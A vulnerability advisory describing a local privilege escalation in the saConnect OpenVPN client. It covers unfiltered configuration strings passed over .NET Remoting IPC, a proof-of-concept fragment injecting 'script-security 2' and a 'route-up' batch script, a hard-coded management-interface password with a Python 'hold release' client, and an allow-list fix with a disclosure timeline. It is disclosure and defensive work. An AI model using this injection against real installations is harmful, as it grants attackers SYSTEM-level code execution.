
July 1, 2024

Advisory: Local privilege escalation in saConnect/saConnectService by Secadm GmbH - now enthus

Release of SCHUTZWERK-SA-2023-002



SCHUTZWERK-SA-2023-002: Local privilege escalation in saConnect/saConnectService by Secadm GmbH - now enthus





CVE reference

Not applicable, since the affected software is not publicly available.




Affected products/vendor

Custom OpenVPN client, saConnect/saConnectService by Secadm GmbH - now enthus


A local privilege escalation was discovered in saConnectService, the Windows service component of the OpenVPN-based VPN client saConnect by Secadm GmbH.
OpenVPN configuration parameters can be set by a low-privileged user via a .NET Remoting IPC[0] call served by saConnectService.
This allows an attacker to execute arbitrary commands with the privilege level of saConnectService through the route-up script hook of the OpenVPN connection.


An attacker with access to an account that is fully configured to use the VPN connection through the saConnect application is able to exploit this vulnerability.
It allows the attacker to escalate privileges to the privilege level of saConnectService.

Depending on how saConnectService is configured, this may be the highest privilege level on the local system (NT AUTHORITY\SYSTEM). In the scenario in which this vulnerability was discovered, it was possible to fully compromise the host system.

An attacker with basic knowledge of C# and an understanding of OpenVPN configurations may find this vulnerability with medium to high effort. To find it, an attacker would likely need to reverse engineer the C# executables of saConnect and saConnectService using tools such as dnSpy[1] or JetBrains dotPeek[2].

To exploit the vulnerability, an attacker needs to understand how the OpenVPN configuration files, namely endpoints.conf and ProxyVPN.conf, are used. In the standard configuration, neither endpoints.conf nor the main OpenVPN configuration file (ProxyVPN.conf) is visible or accessible to a low-privileged user.


A company notebook assessed by SCHUTZWERK for security vulnerabilities was found to contain a local privilege escalation vulnerability in its custom VPN client.
The VPN client, which is part of Secadm GmbH's consulting portfolio (Home-Office und Remote Arbeitsplätze, i.e. home office and remote workplaces)[3], is a convenience wrapper around OpenVPN which, among other things, automatically detects and connects to the best VPN endpoint based on connection quality measurements.
The software establishes the connection through an OpenVPN daemon embedded in saConnectService, which is installed as a Windows service.

Through reverse engineering of the .NET based applications saConnect and saConnectService, SCHUTZWERK discovered the .NET Remoting IPC[0] interface which is used to communicate between these two applications.

Understanding the IPC communication

Reverse engineering showed that saConnect calls the remote functions SetOpenVPNEndpoints and StartOpenVPNServer on saConnectService via a .NET Remoting IPC channel to configure and start the OpenVPN connection.
SetOpenVPNEndpoints writes a configuration string to the file endpoints.conf, which is only accessible to higher-privileged users.
As seen below, endpoints.conf is pulled into the main OpenVPN configuration file, which the OpenVPN daemon reads, via the config directive (the in-file equivalent of the '--config' command-line option[4]). Directives in an included file are applied exactly as if they appeared in the main configuration file.

ProxyVPN.conf (main OpenVPN configuration file):
# remote VPN Server IP / Data
config endpoints.conf

The intended use of SetOpenVPNEndpoints is to set the best OpenVPN endpoint as a connection target which was evaluated via connection quality measurements within saConnect.

SCHUTZWERK discovered that the configuration string passed as a parameter to SetOpenVPNEndpoints is written to endpoints.conf without any modification or filtering. This allows arbitrary configuration parameters to be set, and they are applied as part of the main OpenVPN configuration.

Manipulating the OpenVPN configuration

By adding two configuration lines, script-security and route-up[4], it is possible to have OpenVPN call a user-defined batch script: script-security 2 permits OpenVPN to execute user-defined scripts at all, and route-up names the script that OpenVPN runs once the tunnel is up and its routes have been added, i.e. after successful authentication against the VPN endpoint.
Through that, code execution in the context of saConnectService is achieved as soon as the OpenVPN connection successfully connects to the remote endpoint using the manipulated endpoints.conf.

POC implementation that builds the string written to the endpoints.conf file (C# fragment; the string is handed to SetOpenVPNEndpoints, which writes it unmodified):
using System.Text;

StringBuilder stringBuilder = new StringBuilder();
// Endpoint definition as saConnect would normally generate it
stringBuilder.AppendLine("remote <redacted-ip> 445 udp");
// Client certificate, selected from the Windows certificate store by thumbprint
stringBuilder.AppendLine("cryptoapicert 'THUMB:<Thumbprint of the certificate in the Windows Certificate System Store>'");

// Configuration lines that enable code execution: script-security 2 lets OpenVPN call
// user-defined scripts, route-up names the script run once the tunnel is up.
// Backslashes are doubled for C# and again for OpenVPN's config parser.
stringBuilder.AppendLine("script-security 2");
stringBuilder.AppendLine("route-up 'C:\\\\tmp\\\\exec.bat'");

string endpointsConf = stringBuilder.ToString(); // passed to SetOpenVPNEndpoints via IPC


The saConnect application overwrites endpoints.conf on each connection attempt. To actually execute the script, a PoC application must therefore perform all steps required to successfully launch the VPN connection itself.

Path to a one-click PoC exploit

In order to establish a connection, the PoC application first needs to call the StartOpenVPNServer function on saConnectService to start the embedded OpenVPN daemon. Additionally, because the main OpenVPN configuration sets the management-hold directive[4], which starts OpenVPN in a hibernating state, the PoC needs to issue 'hold release' on the OpenVPN management interface[5].
This tells the OpenVPN daemon to start the connection.

As configured in ProxyVPN.conf, the OpenVPN management interface listens on localhost port 19334 and requires a password before it accepts commands.

ProxyVPN.conf (main OpenVPN configuration file):
# Start OpenVPN in a hibernating state, until a client
# of the management interface explicitly starts it.
management-hold

# Enable a TCP server on ip:port to handle
# management functions.  pass is a password file
# or 'stdin' to prompt from console.
;management ip port [pass]
management 19334 sa/mgmt-pass.txt

The password used to authenticate against the OpenVPN management interface was found hard-coded in the saConnect binary, so any user who can read the binary can recover it. This allows authenticating to the management interface and issuing the required 'hold release' command.

With the ability to write arbitrary configuration flags into the endpoints.conf file and to control the OpenVPN management interface, a one-click C# PoC can be created to exploit this vulnerability.
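The management-interface step described above, as an added example that is not part of the advisory or of the saConnect code base. It is written in Python rather than the C# of the PoC so that it runs stand-alone: a mock server reproduces the message sequence of OpenVPN's management interface[5] when started with a password file and management-hold (password prompt, SUCCESS line, >INFO greeting, >HOLD notification), and the client authenticates and releases the hold. The password, the mock server and the ephemeral localhost port are constructed for this example; the real service listened on 19334.

```python
import socket
import threading

# Constructed password; the advisory found the real one hard-coded in saConnect.
MGMT_PASSWORD = "example-mgmt-password"


def _recv_until(sock, marker):
    """Read from sock until the buffer ends with marker (for prompts without a newline)."""
    buf = b""
    while not buf.endswith(marker):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("management interface closed the connection")
        buf += chunk
    return buf


def release_hold(host, port, password, timeout=5.0):
    """Authenticate to an OpenVPN management interface and issue 'hold release'.

    Returns (released, transcript): whether OpenVPN acknowledged the command,
    and every line exchanged, prefixed C:/S:, so the protocol is visible.
    """
    transcript = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        prompt = _recv_until(sock, b"PASSWORD:").decode()  # "ENTER PASSWORD:" has no newline
        transcript.append("S: " + prompt)
        sock.sendall(password.encode() + b"\r\n")
        transcript.append("C: <password>")
        rf = sock.makefile("rb")
        # After authentication OpenVPN sends a SUCCESS line, its >INFO greeting and,
        # because of management-hold, ">HOLD:Waiting for hold release:0".
        while True:
            raw = rf.readline()
            if not raw:
                raise ConnectionError("connection closed before hold notification")
            line = raw.decode().rstrip("\r\n")
            transcript.append("S: " + line)
            if line.startswith("ERROR:"):
                raise PermissionError(line)
            if line.startswith(">HOLD:"):
                break
        sock.sendall(b"hold release\r\n")
        transcript.append("C: hold release")
        reply = rf.readline().decode().rstrip("\r\n")
        transcript.append("S: " + reply)
        return reply.startswith("SUCCESS:"), transcript


def fake_management_server(listener, password, received):
    """Mock of openvpn.exe started with 'management ... <pass>' and 'management-hold'.

    Mirrors the message sequence of the real management interface; it is a
    stand-in, not OpenVPN. Commands it receives are appended to `received`.
    """
    conn, _ = listener.accept()
    with conn:
        conn.sendall(b"ENTER PASSWORD:")
        rf = conn.makefile("rb")
        if rf.readline().decode().rstrip("\r\n") != password:
            conn.sendall(b"ERROR: bad password\r\n")
            return
        conn.sendall(b"SUCCESS: password is correct\r\n")
        conn.sendall(b">INFO:OpenVPN Management Interface Version 1 -- type 'help' for more info\r\n")
        conn.sendall(b">HOLD:Waiting for hold release:0\r\n")
        cmd = rf.readline().decode().rstrip("\r\n")
        received.append(cmd)
        if cmd == "hold release":
            conn.sendall(b"SUCCESS: hold release succeeded\r\n")  # OpenVPN would now connect
        else:
            conn.sendall(b"ERROR: unknown command, enter 'help' for more options\r\n")


def demo(password=MGMT_PASSWORD, attempt=None):
    """Run the client against the mock on an ephemeral localhost port."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    received = []
    server = threading.Thread(target=fake_management_server,
                              args=(listener, password, received), daemon=True)
    server.start()
    try:
        released, transcript = release_hold("127.0.0.1", listener.getsockname()[1],
                                            attempt if attempt is not None else password)
    finally:
        server.join(timeout=5)
        listener.close()
    return released, received, transcript


if __name__ == "__main__":
    released, received, transcript = demo()
    print("\n".join(transcript))
    print("hold released:", released, "| server saw:", received)
```

The mock also shows why the password file buys nothing here: the secret lives in saConnect.exe, readable by the same low-privileged user the interface is meant to keep out, so whoever can write endpoints.conf can also trigger the connection. Binding the management interface to localhost separates it from the network, not from other local users.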


The vulnerability can be mitigated by introducing an allow-list that restricts the configuration parameters accepted by the SetOpenVPNEndpoints call in the IPC interface to the ones that are actually needed (in this design, remote and cryptoapicert). This excludes every directive that can be used to execute scripts or load code in the context of saConnectService (script-security, up, down, route-up, route-pre-down, ipchange, tls-verify, plugin, ...)[4]. Since endpoints.conf is included via the config directive, any OpenVPN option placed there is honoured, so a deny-list of the known script hooks is not a substitute: parsing the string and rejecting everything outside the allow-list is.
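One way to implement the allow-list, as an added example in Python (not the vendor's fix, whose implementation is not known, and not code from saConnectService, which is C#). It assumes the endpoints string legitimately needs nothing but remote lines and a cryptoapicert THUMB selector; the sample strings are constructed, the injected one mirroring the two lines the PoC above appends:

```python
import re
import shlex

# Strict allow-list for the endpoints string that saConnect hands to
# SetOpenVPNEndpoints. Only 'remote' and 'cryptoapicert' survive; every other
# directive is rejected, so the script hooks (up, down, route-up, route-pre-down,
# ipchange, tls-verify, auth-user-pass-verify, client-connect, learn-address),
# 'script-security', 'plugin' and file-writing options such as 'log' or
# 'writepid' never have to be enumerated in a deny-list.
HOST_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)
THUMB_RE = re.compile(r"^THUMB:[0-9a-f]{40}$", re.I)  # SHA-1 thumbprint, no spaces (assumption)
PROTOS = {"udp", "tcp", "tcp-client", "udp4", "udp6", "tcp4", "tcp6"}
MAX_DIRECTIVES = 4  # a handful of endpoints plus one certificate selector


def _check_remote(args):
    if len(args) not in (2, 3):
        return "remote: expected <host> <port> [proto]"
    host, port = args[0], args[1]
    if not HOST_RE.match(host):
        return f"remote: bad host {host!r}"
    if not port.isdigit() or not 1 <= int(port) <= 65535:
        return f"remote: bad port {port!r}"
    if len(args) == 3 and args[2] not in PROTOS:
        return f"remote: bad protocol {args[2]!r}"
    return None


def _check_cryptoapicert(args):
    if len(args) != 1 or not THUMB_RE.match(args[0]):
        return "cryptoapicert: expected a single 'THUMB:<40 hex digits>' selector"
    return None


ALLOWED = {"remote": _check_remote, "cryptoapicert": _check_cryptoapicert}


def validate_endpoints(text):
    """Return (ok, problems) for a candidate endpoints.conf body.

    The service should refuse to write the file unless ok is True.
    """
    problems = []
    directives = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):  # OpenVPN comment lines
            continue
        try:
            tokens = shlex.split(line, comments=True)  # quoting close to what OpenVPN accepts
        except ValueError as exc:
            problems.append(f"unparseable line {line!r}: {exc}")
            continue
        if tokens:
            directives.append(tokens)
    if len(directives) > MAX_DIRECTIVES:
        problems.append(f"too many directives ({len(directives)} > {MAX_DIRECTIVES})")
    for n, tokens in enumerate(directives, 1):
        check = ALLOWED.get(tokens[0])
        if check is None:
            problems.append(f"directive {n}: {tokens[0]!r} is not allowed")
            continue
        err = check(tokens[1:])
        if err:
            problems.append(f"directive {n}: {err}")
    return (not problems, problems)


# Constructed samples (not the advisory's real files): what saConnect legitimately
# sends, and the same string with the two lines the PoC appends.
LEGIT = (
    "remote 203.0.113.10 1194 udp\n"
    "cryptoapicert 'THUMB:0123456789abcdef0123456789abcdef01234567'\n"
)
INJECTED = LEGIT + "script-security 2\nroute-up 'C:\\\\tmp\\\\exec.bat'\n"

if __name__ == "__main__":
    for name, body in (("legit", LEGIT), ("injected", INJECTED)):
        ok, problems = validate_endpoints(body)
        print(name, "accepted" if ok else "rejected", problems)
```

Parsing and re-checking every directive is what makes this robust: a deny-list of the script hooks would miss plugin, which loads a DLL into the OpenVPN process, and file-writing options such as log or writepid that overwrite files with the service's privileges. The same function can be run over an existing endpoints.conf to audit a deployed installation.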

Since Secadm GmbH (now enthus) did not provide a version number for the fixed version, please contact enthus[6] if you are unsure whether you are running the version containing the fix.

Disclosure timeline

2023-05-24: Vulnerability discovered
2023-05-30: Request to the customer to find a contact person at the manufacturer
2023-06-11: Initial contact with manufacturer via customer contact person
2023-06-15: Reply from the manufacturer with a request for more information
2023-06-16: Provision of technical information to trace the security vulnerability
2023-06-26: Inquire with the manufacturer about the current status and plan for patch release
2023-06-28: Bug has been fixed and new version created. Preparation for rollout plan underway
2023-09-14: Contact the manufacturer to find out the status of the customer's patch rollout
2023-09-23: Reply from the customer that rollout completion is planned by the end of September 2023
2023-11-29: Customer informed that rollout of the patch is completed
2024-07-01: Advisory released


The vulnerability was discovered during an assessment by Marvin Louis and Moritz Öhrlein of SCHUTZWERK GmbH.

[0] https://learn.microsoft.com/de-de/dotnet/api/system.runtime.remoting.channels.ipc?view=netframework-4.8.1
[1] https://github.com/dnSpy/dnSpy
[2] https://www.jetbrains.com/de-de/decompiler/
[3] https://secadm.de/consulting.html
[4] https://openvpn.net/community-resources/reference-manual-for-openvpn-2-4/
[5] https://openvpn.net/community-resources/management-interface/
[6] https://enthus.de/


The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The most recent version of this security advisory can be found at SCHUTZWERK GmbH's website ( https://www.schutzwerk.com ).

Additional information

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/


~ Marvin Louis, Moritz Öhrlein
